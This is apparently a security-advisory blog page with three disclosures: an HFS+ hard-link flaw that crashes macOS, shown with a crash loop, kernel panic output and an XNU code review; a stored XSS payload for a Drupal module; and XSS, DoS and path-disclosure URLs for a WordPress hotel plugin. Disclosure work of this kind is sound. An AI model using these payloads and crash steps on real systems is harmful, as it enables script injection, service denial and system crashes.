http://cxsecurity.com/issue/WLB-2013110059

The HFS+ file system does not apply strict privilege rules when creating
hard links. The ability to create hard links to directories is wrongly
implemented, and the issue affects OS versions greater than or equal to
10.5. Officially, Apple only allows directory hard links for Time Machine.
<see wiki> Vulnerability CVE-2013-6799 (an incomplete fix for CVE-2010-0105)
allows creating hard links to directories, and the number of hard links may
be arbitrarily high. To create N hard links you must use a special algorithm
that creates links from the top of the file system tree: first create the
directory structure, then walk it from the top down, creating hard links.
Last time I mentioned the possibility of a kernel crash by running the 'ls'
command. This happens in conjunction with the 'find' application.

Commands such as 'ls' behave in unexpected ways; Apple will have to find
this crash point in the code. To create a huge hard-link structure, use
this code:
 
http://cert.cx/stuff/l2.c
 
-----------------------------------
h1XSS:tysiak cx$ uname -a
Darwin 000000000000000.home 13.1.0 Darwin Kernel Version 13.1.0: Thu Jan 16
19:40:37 PST 2014; root:xnu-2422.90.20~2/RELEASE_X86_64 x86_64
h1xss:tysiak cx$ gcc -o l2 l2.c
h1xss:tysiak cx$ ./l2 1000
...
h1xss:tysiak cx$ cat loop.sh
#!/bin/bash
while [ 1 ] ; do
ls -laR B > /dev/null
done
 
h1xss:tysiak cx$ sh ./loop.sh
ls: B: No such file or directory
ls: X1: No such file or directory
...
ls: X8: Bad address
ls: X1: Bad address
ls: X2: Bad address
...
ls: X8: No such file or directory
./loop.sh: line 4:  8816 Segmentation fault: 11  ls -laR B > /dev/null
./loop.sh: line 4:  8818 Segmentation fault: 11  ls -laR B > /dev/null
ls: B: No such file or directory
ls: X1: No such file or directory
ls: X2: No such file or directory
...
ls: X1: No such file or directory
ls: X2: No such file or directory
-----------
...
-----------
Feb  9 21:16:38 h1xss.home ReportCrash[9419]: Saved crash report for
ls[9418] version 230 to
/Users/freak/Library/Logs/DiagnosticReports/ls_2014-02-09-211638_h1XSS.crash
-----------
 
What we see here is unexpected behaviour of the ls command. The ls process
is also caught in an infinite loop (recursion?).
 
-----------
h1xss:tysiak cx$ ps -fp 8822
  UID   PID  PPID   C STIME   TTY           TIME CMD
  501  8822  8810   0  7:36   ttys002   62:19.65 ls -laR B
-----------
 
or, run in parallel with a (find . > /dev/null) command, causes a kernel crash:
 
-----------
Mon Mar 31 20:30:41 2014
panic(cpu 0 caller 0xffffff80044dbe2e): Kernel trap at 0xffffff8004768838,
type 13=general protection, registers:
CR0: 0x0000000080010033, CR2: 0xffffff8122877004, CR3: 0x0000000001a5408c,
CR4: 0x00000000001606e0
RAX: 0xffffff802bc148a0, RBX: 0xdeadbeefdeadbeef, RCX: 0x0000000000008000,
RDX: 0x0000000000000000
RSP: 0xffffff8140d9b990, RBP: 0xffffff8140d9b9a0, RSI: 0x0000000000000018,
RDI: 0xffffff802f23bcd0
R8:  0xffffff8140d9bc1c, R9:  0xffffff802f26e960, R10: 0xffffff8140d9ba2c,
R11: 0x0000000000000f92
R12: 0xffffff801ba1a008, R13: 0xffffff8140d9bb20, R14: 0xffffff802f23bcd0,
R15: 0xffffff802f26e960
RFL: 0x0000000000010282, RIP: 0xffffff8004768838, CS:  0x0000000000000008,
SS:  0x0000000000000010
Fault CR2: 0xffffff8122877004, Error code: 0x0000000000000000, Fault CPU:
0x0
 
Backtrace (CPU 0), Frame : Return Address
0xffffff811eee8c50 : 0xffffff8004422fa9
 
BSD process name corresponding to current thread: ls
-----------
 
XNU is the operating system kernel that Apple Inc. acquired and developed
for use in Mac OS X and released as free and open source software as part
of the Darwin operating system, so we can read the HFS implementation
directly. Let's start a static code analysis using the cifrex.org tool!
 
-1.---------------------------------------------------------
Unchecked Return Value to NULL Pointer Dereference in hfs_vfsops.c
 
Code:
http://opensource.apple.com/source/xnu/xnu-2422.1.72/bsd/hfs/hfs_vfsops.c
 
--- hfs_vfsops.c ----------------------------
/*
 * HFS filesystem related variables.
 */
int
hfs_sysctl(int *name, __unused u_int namelen, user_addr_t oldp, size_t *oldlenp,
           user_addr_t newp, size_t newlen, vfs_context_t context)
{
...
        if ((newlen <= 0) || (newlen > MAXPATHLEN))
            return (EINVAL);

        bufsize = MAX(newlen * 3, MAXPATHLEN);
        MALLOC(filename, char *, newlen, M_TEMP, M_WAITOK);
        if (filename == NULL) {                       /* <===== filename CHECK */
            error = ENOMEM;
            goto encodinghint_exit;
        }
        MALLOC(unicode_name, u_int16_t *, bufsize, M_TEMP, M_WAITOK);
        if (filename == NULL) {                       /* <===== double CHECK? */
            error = ENOMEM;
            goto encodinghint_exit;
        }

        error = copyin(newp, (caddr_t)filename, newlen);
        if (error == 0) {
            error = utf8_decodestr((u_int8_t *)filename, newlen - 1, unicode_name,
                                   &bytes, bufsize, 0, UTF_DECOMPOSED);
            if (error == 0) {
                hint = hfs_pickencoding(unicode_name, bytes / 2);
                error = sysctl_int(oldp, oldlenp, USER_ADDR_NULL, 0, (int32_t *)&hint);
            }
        }
--- hfs_vfsops.c----------------------------
 
Checking 'filename' twice makes no sense; the second condition should
probably check 'unicode_name', which is otherwise used without a NULL check.
 
 
-2.---------------------------------------------------------
Possible Buffer Overflow in resource fork (hfs_vnops.c)
 
The value returned by snprintf() is not checked, and it may be larger than
the declared buffer size (MAXPATHLEN):
 
 
https://developer.apple.com/library/mac/documentation/Darwin/Reference/ManPages/man3/snprintf.3.html
---
The snprintf() and vsnprintf() functions will write at most n-1 of the
characters printed into the output string (the n'th character then gets the
terminating `\0'); if the return value is greater than or equal to the n
argument, the string was too short and some of the printed characters were
discarded. The output is always null-terminated.
---
 
 
Code:
http://opensource.apple.com/source/xnu/xnu-2422.1.72/bsd/hfs/hfs_vnops.c
 
--- hfs_vnops.c ----------------------------
...
/*
 * hfs_vgetrsrc acquires a resource fork vnode corresponding to the cnode that is
 * found in 'vp'.  The rsrc fork vnode is returned with the cnode locked and iocount
 * on the rsrc vnode.
 *
 ...
 */
 
int
hfs_vgetrsrc(struct hfsmount *hfsmp, struct vnode *vp, struct vnode **rvpp,
             int can_drop_lock, int error_on_unlinked)
{
 
...
 
    /*
     * Supply hfs_getnewvnode with a component name.
     */
    cn.cn_pnbuf = NULL;
    if (descptr->cd_nameptr) {
        MALLOC_ZONE(cn.cn_pnbuf, caddr_t, MAXPATHLEN, M_NAMEI, M_WAITOK);
        cn.cn_nameiop = LOOKUP;
        cn.cn_flags = ISLASTCN | HASBUF;
        cn.cn_context = NULL;
        cn.cn_pnlen = MAXPATHLEN;
        cn.cn_nameptr = cn.cn_pnbuf;
        cn.cn_hash = 0;
        cn.cn_consume = 0;
        cn.cn_namelen = snprintf(cn.cn_nameptr, MAXPATHLEN, <================
                                 "%s%s", descptr->cd_nameptr,
                                 _PATH_RSRCFORKSPEC);
    }
    dvp = vnode_getparent(vp);
    error = hfs_getnewvnode(hfsmp, dvp, cn.cn_pnbuf ? &cn : NULL, <================
                            descptr, GNV_WANTRSRC | GNV_SKIPLOCK, &cp->c_attr,
                            &rsrcfork, &rvp, &newvnode_flags);
 
--- hfs_vnops.c ----------------------------
 
The format is '%s%s', where the combined length of descptr->cd_nameptr and
_PATH_RSRCFORKSPEC may exceed the declared buffer size (MAXPATHLEN). The size
of descptr->cd_nameptr is MAXPATHLEN and the value of _PATH_RSRCFORKSPEC is

  #define _PATH_RSRCFORKSPEC     "/..namedfork/rsrc"

which is 17 characters long. Is an overflow of up to 17 characters possible here?
 
Now let's look at the hfs_getnewvnode function:
 
http://opensource.apple.com/source/xnu/xnu-2422.1.72/bsd/hfs/hfs_cnode.c
 
--- hfs_cnode.c ----------------------------
hfs_getnewvnode(
    struct hfsmount *hfsmp,
    struct vnode *dvp,
    struct componentname *cnp, <======== WATCH THIS
    struct cat_desc *descp,
    int flags,
    struct cat_attr *attrp,
    struct cat_fork *forkp,
    struct vnode **vpp,
    int *out_flags)
{
...
                if ((*vpp != NULL) && (cnp)) {
                    /* we could be requesting the rsrc of a hardlink file... */
                    vnode_update_identity (*vpp, dvp, cnp->cn_nameptr,
                            cnp->cn_namelen, cnp->cn_hash, <== NAMELEN HERE
                            (VNODE_UPDATE_PARENT | VNODE_UPDATE_NAME));
...
--- hfs_cnode.c ----------------------------
 
and the call to vnode_update_identity():
 
http://opensource.apple.com/source/xnu/xnu-2422.1.72/bsd/vfs/vfs_cache.c
 
 
--- vfs_cache.c ----------------------------
void
vnode_update_identity(vnode_t vp, vnode_t dvp, const char *name, int name_len,
                      uint32_t name_hashval, int flags)
{
...
    if ( (flags & VNODE_UPDATE_NAME) ) {
        if (name != vp->v_name) {
            if (name && *name) {
                if (name_len == 0)
                    name_len = strlen(name);
                tname = vfs_addname(name, name_len, name_hashval, 0); <== NAMELEN HERE
            }
        } else
            flags &= ~VNODE_UPDATE_NAME;
    }
...
const char *
vfs_addname(const char *name, uint32_t len, u_int hashval, u_int flags)
{
    return (add_name_internal(name, len, hashval, FALSE, flags));  <== CALL
 
}
--- vfs_cache.c ----------------------------
 
And the invalid memory reference in add_name_internal():
 
--- vfs_cache.c ----------------------------
static const char *
add_name_internal(const char *name, uint32_t len, u_int hashval,
                  boolean_t need_extra_ref, __unused u_int flags)
{
    struct stringhead *head;
    string_t          *entry;
    uint32_t          chain_len = 0;
    uint32_t          hash_index;
    uint32_t          lock_index;
    char              *ptr;
 
    /*
     * if the length already accounts for the null-byte, then
     * subtract one so later on we don't index past the end
     * of the string.
     */
    if (len > 0 && name[len-1] == '\0') { <===== INVALID MEMORY REFERENCE
        len--;
    }
    if (hashval == 0) {
        hashval = hash_string(name, len);
    }
--- vfs_cache.c ----------------------------
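To make the chain in finding 2 concrete (snprintf()'s return value is not the number of characters actually written, that value becomes cn_namelen, and add_name_internal() then indexes name[len-1] with it), here is an added example. It is not XNU code and not Apple's fix: a user-space model with a constructed 32-byte DEMO_MAXPATHLEN and the _PATH_RSRCFORKSPEC string exactly as quoted above. The names rsrc_namelen_as_quoted, rsrc_namelen_checked, namelen_index_in_bounds and the worst_case_* helpers are made up for the demonstration; the checked variant applies the return-value test that snprintf(3) describes.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Constructed stand-ins: a small MAXPATHLEN so the worst case is easy to build,
 * and the resource fork suffix exactly as quoted above (17 characters). */
#define DEMO_MAXPATHLEN 32
#define DEMO_RSRCFORKSPEC "/..namedfork/rsrc"

/*
 * Mirrors the quoted hfs_vgetrsrc pattern: cn_namelen is whatever snprintf()
 * returns. snprintf() never writes more than bufsize - 1 characters plus the
 * NUL, but it returns the length the untruncated string would have had, so
 * the stored length can exceed the buffer. Returns that would-be cn_namelen.
 */
size_t rsrc_namelen_as_quoted(const char *name, char *buf, size_t bufsize)
{
    return (size_t)snprintf(buf, bufsize, "%s%s", name, DEMO_RSRCFORKSPEC);
}

/*
 * Hardened counterpart (added here, not Apple's fix): per snprintf(3), a return
 * value >= bufsize means output was discarded. Refuse instead of propagating
 * the oversized length. Returns 0 on success (real length in *out_len), -1 on
 * truncation or encoding error.
 */
int rsrc_namelen_checked(const char *name, char *buf, size_t bufsize,
                         size_t *out_len)
{
    int n = snprintf(buf, bufsize, "%s%s", name, DEMO_RSRCFORKSPEC);
    if (n < 0)
        return -1;                   /* encoding error */
    if ((size_t)n >= bufsize)
        return -1;                   /* truncated: name + suffix does not fit */
    *out_len = (size_t)n;
    return 0;
}

/*
 * The first thing add_name_internal() does with the length is read
 * name[len-1]. Reports whether that index lies inside a buffer of bufsize
 * bytes: 1 = in bounds, 0 = would read past the buffer.
 */
int namelen_index_in_bounds(size_t len, size_t bufsize)
{
    return len > 0 && (len - 1) < bufsize;
}

/* Constructed worst case: a cd_nameptr that already fills MAXPATHLEN - 1 bytes. */
static void fill_longname(char *longname, size_t size)
{
    memset(longname, 'a', size - 1);
    longname[size - 1] = '\0';
}

/* cn_namelen the quoted code would store for the worst case. */
size_t worst_case_naive_namelen(void)
{
    char buf[DEMO_MAXPATHLEN], longname[DEMO_MAXPATHLEN];
    fill_longname(longname, sizeof(longname));
    return rsrc_namelen_as_quoted(longname, buf, sizeof(buf));
}

/* Result of the hardened variant for the same worst case (-1 = refused). */
int worst_case_checked_result(void)
{
    char buf[DEMO_MAXPATHLEN], longname[DEMO_MAXPATHLEN];
    size_t len = 0;
    fill_longname(longname, sizeof(longname));
    return rsrc_namelen_checked(longname, buf, sizeof(buf), &len);
}

int main(void)
{
    char buf[DEMO_MAXPATHLEN];
    size_t len = 0;
    size_t naive = worst_case_naive_namelen();

    printf("naive cn_namelen = %zu for a %d-byte buffer; name[len-1] in bounds: %d\n",
           naive, DEMO_MAXPATHLEN, namelen_index_in_bounds(naive, DEMO_MAXPATHLEN));
    printf("checked worst case: %d (-1 = truncation refused)\n",
           worst_case_checked_result());
    if (rsrc_namelen_checked("f", buf, sizeof(buf), &len) == 0)
        printf("checked short name: \"%s\" (len %zu)\n", buf, len);
    return 0;
}
```

With the 31-byte worst-case name the naive length comes out as 48 against a 32-byte buffer, so the later name[len-1] read lands 16 bytes past the end, while the checked variant refuses the name outright. The same test scales to the real MAXPATHLEN: any cd_nameptr within 17 bytes of the limit produces a return value of MAXPATHLEN or more.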
 
 
-3.---------------------------------------------------------
Unchecked Return Value to NULL Pointer Dereference in hfs_catalog.c and
elsewhere
 
Note that the buffer length (stored in some variable) should be checked, and
that the return value of the *alloc() function family should be verified for
a possible NULL pointer.
Here are a few FALSE / POSITIVE examples.
 
http://opensource.apple.com/source/xnu/xnu-2422.1.72/bsd/hfs/hfs_catalog.c
 
--- hfs_catalog.c ----------------------------
 /*
 * builddesc - build a cnode descriptor from an HFS+ key
 */
static int
builddesc(const HFSPlusCatalogKey *key, cnid_t cnid, u_int32_t hint, u_int32_t encoding,
          int isdir, struct cat_desc *descp)
{
    int result = 0;
    unsigned char * nameptr;
    size_t bufsize;
    size_t utf8len;
    unsigned char tmpbuff[128];
 
    /* guess a size... */
    bufsize = (3 * key->nodeName.length) + 1;
    if (bufsize >= sizeof(tmpbuff) - 1) { <============================
        MALLOC(nameptr, unsigned char *, bufsize, M_TEMP, M_WAITOK); <= MALLOC FAIL
    } else {
        nameptr = &tmpbuff[0];
    }
 
    result = utf8_encodestr(key->nodeName.unicode,
            key->nodeName.length * sizeof(UniChar),
            nameptr, (size_t *)&utf8len, <============================
 
...
    maxlinks = MIN(entrycnt, (u_int32_t)(uio_resid(uio) / SMALL_DIRENTRY_SIZE));
    bufsize = MAXPATHLEN + (maxlinks * sizeof(linkinfo_t)) + sizeof(*iterator);
    if (extended) {
        bufsize += 2*sizeof(struct direntry);
    }
    MALLOC(buffer, void *, bufsize, M_TEMP, M_WAITOK); <============================
    bzero(buffer, bufsize);
...
    FREE(nameptr, M_TEMP);
    MALLOC(nameptr, unsigned char *, bufsize, M_TEMP, M_WAITOK); <==============

    result = utf8_encodestr(key->nodeName.unicode,
                            key->nodeName.length * sizeof(UniChar),
                            nameptr, (size_t *)&utf8len,
                            bufsize, ':', 0);
}
...
    cnp = (const CatalogName *)&ckp->hfsPlus.nodeName;
    bufsize = 1 + utf8_encodelen(cnp->ustr.unicode,
                                 cnp->ustr.length * sizeof(UniChar),
                                 ':', 0);
    MALLOC(new_nameptr, u_int8_t *, bufsize, M_TEMP, M_WAITOK); <========
    result = utf8_encodestr(cnp->ustr.unicode,
                            cnp->ustr.length * sizeof(UniChar),
                            new_nameptr, &tmp_namelen, bufsize, ':', 0);
 
--- hfs_catalog.c ----------------------------
 
The above examples do not look nice either. Is the crux of the application and
kernel crash problem among them?
I informed Apple of these possible errors; more than a month has passed and I
still have not received any comment or solution.
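Finding 1 (the check after the second MALLOC re-tests 'filename') and finding 3 (MALLOC results used without any check) come down to the same rule: test the pointer the allocation just returned, by name, before using it. The following is an added example, not XNU code and not Apple's fix: a user-space model of the hfs_sysctl sequence with a constructed fault-injecting allocator standing in for MALLOC(..., M_WAITOK), so the quoted recheck and a corrected one can be run side by side. DEMO_MAXPATHLEN, fallible_alloc, reset_allocator, encodinghint_as_quoted and encodinghint_fixed are all made up for the demonstration; the buggy variant reports instead of dereferencing the NULL pointer.

```c
#include <errno.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>

/*
 * Constructed fault-injecting allocator standing in for MALLOC(..., M_WAITOK):
 * the fail_on_call'th allocation after reset_allocator() returns NULL
 * (0 = never fail). This is what lets the two checking patterns below be
 * exercised from user space.
 */
static int g_alloc_calls;
static int g_fail_on_call;

static void *fallible_alloc(size_t n)
{
    g_alloc_calls++;
    if (g_alloc_calls == g_fail_on_call)
        return NULL;
    return malloc(n);
}

void reset_allocator(int fail_on_call)
{
    g_alloc_calls = 0;
    g_fail_on_call = fail_on_call;
}

/* Stand-in for MAX(newlen * 3, MAXPATHLEN) with a small constructed MAXPATHLEN. */
#define DEMO_MAXPATHLEN 64
static size_t unicode_bufsize(size_t newlen)
{
    return newlen * 3 > DEMO_MAXPATHLEN ? newlen * 3 : DEMO_MAXPATHLEN;
}

/*
 * Mirrors the hfs_sysctl sequence quoted in finding 1: the check after the
 * second allocation re-tests 'filename'. Rather than dereferencing, the
 * function reports what would happen next:
 *   -ENOMEM : failure caught and reported
 *    1      : control reaches utf8_decodestr() with unicode_name == NULL
 *    0      : both buffers valid
 */
int encodinghint_as_quoted(size_t newlen)
{
    char *filename;
    unsigned short *unicode_name;
    int outcome;

    filename = fallible_alloc(newlen);
    if (filename == NULL)
        return -ENOMEM;
    unicode_name = fallible_alloc(unicode_bufsize(newlen));
    if (filename == NULL) {            /* bug: wrong pointer checked again */
        free(filename);
        return -ENOMEM;
    }
    /* utf8_decodestr(filename, ..., unicode_name, ...) would run here */
    outcome = (unicode_name == NULL) ? 1 : 0;
    free(unicode_name);
    free(filename);
    return outcome;
}

/*
 * Corrected pattern (added here, not Apple's fix): each allocation result is
 * tested by name right after the call, and the earlier buffer is released on
 * the error path. Same return convention; outcome 1 can no longer occur.
 */
int encodinghint_fixed(size_t newlen)
{
    char *filename;
    unsigned short *unicode_name;

    filename = fallible_alloc(newlen);
    if (filename == NULL)
        return -ENOMEM;
    unicode_name = fallible_alloc(unicode_bufsize(newlen));
    if (unicode_name == NULL) {
        free(filename);
        return -ENOMEM;
    }
    /* utf8_decodestr(filename, ..., unicode_name, ...) would run here */
    free(unicode_name);
    free(filename);
    return 0;
}

int main(void)
{
    reset_allocator(2);
    printf("as quoted, 2nd MALLOC fails: %d (1 = NULL unicode_name reaches decode)\n",
           encodinghint_as_quoted(16));
    reset_allocator(2);
    printf("fixed, 2nd MALLOC fails: %d (-ENOMEM = %d)\n",
           encodinghint_fixed(16), -ENOMEM);
    return 0;
}
```

The same harness applies to the hfs_catalog.c sites in finding 3: any MALLOC result that is passed straight to utf8_encodestr() or bzero() can be exercised by making that call the failing one and confirming the caller returns ENOMEM rather than continuing.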
 
 
--- 1. References ---
http://cxsecurity.com/issue/WLB-2014040027
http://cxsecurity.com/cveshow/CVE-2013-6799/
http://cxsecurity.com/cveshow/CVE-2010-0105/
 
 
--- 2. Greetz ---
Kacper George and Michal
 
 
--- 3. Credit ---
Maksymilian Arciemowicz
http://cxsecurity.com/
http://cifrex.org/
http://cert.cx/
 
Best regards,
CXSEC TEAM
http://cxsec.org/


3Apr/14

Drupal 7.26 Custom Search 7.x-1.13 Cross Site Scripting

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
 
Vulnerability Report
 
 
Author: Justin C. Klein Keane <justin@madirish.net>
Reported: 19 Feb, 2014
 
 
Description of Vulnerability:
- -----------------------------
Drupal (http://drupal.org) is a robust content management system (CMS)
written in PHP and MySQL.  The Custom Search module "alters the default
search box in many ways. If you need to have options available like in
advanced search, but directly in the search box, this module is for
you."  The Drupal Custom Search module
(https://drupal.org/project/custom_search) contains a persistent cross
site scripting (XSS) vulnerability due to the fact that it fails to
sanitize filter labels before display.
 
 
Systems affected:
- -----------------
Drupal 7.26 with Custom Search 7.x-1.13 was tested and shown to be
vulnerable
 
 
Impact
- ------
Users can inject arbitrary HTML (including JavaScript) in order to
attack site users, including administrative users.  This could lead to
account compromise, which could in turn lead to web server compromise,
or expose administrative users to client side malware attacks.
 
 
Mitigating factors:
- -------------------
In order to inject arbitrary script malicious users must have the
ability "administer custom search."
 
 
Proof of Concept Exploits:
- -----------------
1.  Install and enable the Custom Search module
2.  Navigate to the Custom Search configuration at
?q=admin/config/search/custom_search/results
3.  Change the 'Position' drop down to 'Above results'
4.  Enter "<script>alert('xss');</script>" in the 'Label text' input
field
5.  Click the 'Save Configuration' button
6.  Submit any search to view the JavaScript on the results page.
 
 
Vendor response:
- ----------------
Vulnerability is fixed in the latest versions of the Custom Search
module (ref https://drupal.org/node/2231665)
 
- -- 
Justin C. Klein Keane
http://www.MadIrish.net
 
The digital signature on this e-mail may be verified using
the public key at http://www.madirish.net/gpgkey
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.22 (Darwin)
Comment: GPGTools - http://gpgtools.org
Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
 
iPwEAQECAAYFAlM8n/8ACgkQkSlsbLsN1gAGXwb9FaDO4jn6RBhqOqLkvFPu3eJE
Ae+E5BEAxJ8wQpZx2dnen5hizNtN0q2o6LkDffwkEaOjZMJZIum23F8ovnxciuiA
B/vg4ZfKav+08Ac8ZJcC5FwKbz0hs6mlMR5aLGQK28PjLShEEtMUEzlfDzhAA1GK
3I3huJIUCszR5nkgYGjvxrHmCVHMEZ9f0hS5L6tfEaLKCSFtyVbM65CfdGcFnrr0
o2+YQd9NQ8NnLYe+wB2VGXgydBseQ8AdshnB6c1WTG7/lHHVqOV2f8vbr4kewoCz
PQln6M5j/UJtaMyMmds=
=Sqil
-----END PGP SIGNATURE-----


3Apr/14

WordPress Js-Multi-Hotel 2.2.1 XSS / DoS / Disclosure / Abuse

Hello list!
 
There are multiple vulnerabilities in Js-Multi-Hotel plugin for WordPress. 
Earlier I wrote about two other vulnerabilities.
 
These are Abuse of Functionality, Denial of Service, Cross-Site Scripting 
and Full path disclosure vulnerabilities in Js-Multi-Hotel plugin for 
WordPress. There are many more vulnerabilities in this plugin (including 
dangerous holes), so after these two advisories I'll write new ones.
 
-------------------------
Affected products:
-------------------------
 
Vulnerable are Js-Multi-Hotel 2.2.1 and previous versions.
 
-------------------------
Affected vendors:
-------------------------
 
Joomlaskin
http://www.joomlaskin.it
 
----------
Details:
----------
 
Abuse of Functionality (WASC-42):
 
http://site/wp-content/plugins/js-multihotel/includes/show_image.php?file=http://site&w=1&h=1
 
DoS (WASC-10):
 
http://site/wp-content/plugins/js-multihotel/includes/show_image.php?file=http://site/big_file&h=1&w=1
 
Besides conducting a DoS attack manually, it's also possible to conduct 
automated DoS and DDoS attacks using DAVOSET 
(http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-June/008850.html).
 
DDoS attacks via other sites execution tool: 
http://websecurity.com.ua/davoset/
 
Video demonstration of DAVOSET: http://www.youtube.com/watch?v=RKi35-f346I
 
Cross-Site Scripting (WASC-08):
 
http://site/wp-content/plugins/js-multihotel/includes/delete_img.php?path=%3Cbody%20onload=with(document)alert(cookie)%3E
 
The XSS vulnerability in refreshDate.php in the roomid parameter was 
written about earlier 
(http://packetstormsecurity.com/files/124239/WordPress-Js-Multi-Hotel-2.2.1-Cross-Site-Scripting.html).
 
Full path disclosure (WASC-13):
 
http://site/wp-content/plugins/js-multihotel/includes/functions.php
 
http://site/wp-content/plugins/js-multihotel/includes/myCalendar.php
 
http://site/wp-content/plugins/js-multihotel/includes/refreshDate.php?d=
 
http://site/wp-content/plugins/js-multihotel/includes/show_image.php
 
http://site/wp-content/plugins/js-multihotel/includes/widget.php
 
http://site/wp-content/plugins/js-multihotel/includes/phpthumb/GdThumb.inc.php
 
http://site/wp-content/plugins/js-multihotel/includes/phpthumb/thumb_plugins/gd_reflection.inc.php
 
I wrote about these vulnerabilities at my site 
(http://websecurity.com.ua/7087/).
 
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
